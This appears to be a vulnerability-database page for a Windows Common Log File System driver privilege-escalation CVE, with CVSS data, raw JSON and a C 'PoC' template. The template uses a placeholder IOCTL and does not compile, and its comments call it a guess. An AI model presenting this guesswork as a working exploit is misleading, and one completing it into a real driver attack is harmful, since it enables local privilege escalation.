Security Vulnerability Report
CVE-2026-40397 CVSS 7.8 HIGH

CVE-2026-40397

Published: 2026-05-12 18:17:17
Last Modified: 2026-05-13 15:34:53

Description

Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

具体受影响版本请参考Microsoft安全响应中心(MSRC)公告

PoC / Exploit Code

⚠ For Security Research Only
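The following code is for security research and authorized testing only. It is a hypothetical template rather than a working proof of concept: the IOCTL code is a placeholder (`0xXXXX`), and the buffer layout is the author's assumption, not something taken from the advisory.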
c
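#include <windows.h>
#include <stdio.h>
#include <string.h>

// Illustrative sketch of how a user-mode program passes an input buffer to a
// driver through DeviceIoControl. It is not a verified reproduction of
// CVE-2026-40397: the advisory text on this page gives only the weakness
// class (CWE-191, integer underflow) and the affected component, and names no
// control code, buffer layout or device path.
// The only remediation pointer on this page is the MSRC update-guide entry
// for the CVE.

// Hypothetical IOCTL for CLFS interaction.
// NOTE(review): 0xXXXX is a placeholder, not a valid C constant, so this
// listing does not compile as written.
#define CLFS_IOCTL_VULN 0xXXXX

// Opens the device named in the listing, sends one fixed 0x20-byte buffer with
// the hypothetical control code, reports the API result, and closes the handle.
// Returns 1 if the device cannot be opened, otherwise 0.
int main(void)
{
    // NOTE(review): the device path is the listing's own assumption; nothing
    // on this page confirms it.
    HANDLE hDevice = CreateFileA("\\\\.\\Clfs",
                                 GENERIC_READ | GENERIC_WRITE,
                                 0,
                                 NULL,
                                 OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL,
                                 NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        // GetLastError() returns a DWORD (unsigned long), so %lu, not %d.
        printf("Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    // Fixed-size input buffer filled with a recognisable byte pattern.
    BYTE inputBuffer[0x20];
    memset(inputBuffer, 0x41, sizeof(inputBuffer));

    // The listing's premise: a length field of 0 could wrap if a driver
    // subtracts a header size from it without a lower-bound check. The 0x10
    // offset and the field's meaning are the author's guess, not advisory data.
    // memcpy replaces the original cast-and-store through a BYTE array, which
    // depended on alignment and aliasing assumptions.
    DWORD sizeField = 0x0;
    memcpy(inputBuffer + 0x10, &sizeField, sizeof(sizeField));

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(hDevice,
                                  CLFS_IOCTL_VULN,
                                  inputBuffer,
                                  sizeof(inputBuffer),
                                  NULL,
                                  0,
                                  &bytesReturned,
                                  NULL);

    if (result) {
        // A TRUE return only means the request completed; the program never
        // inspects its own token, so it cannot claim that anything changed.
        printf("IOCTL returned success; this does not by itself show a privilege change.\n");
    } else {
        printf("IOCTL failed. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}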

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40397", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:17.273", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer underflow (wrap or wraparound) in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-191"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40397", "source": "[email protected]"}]}}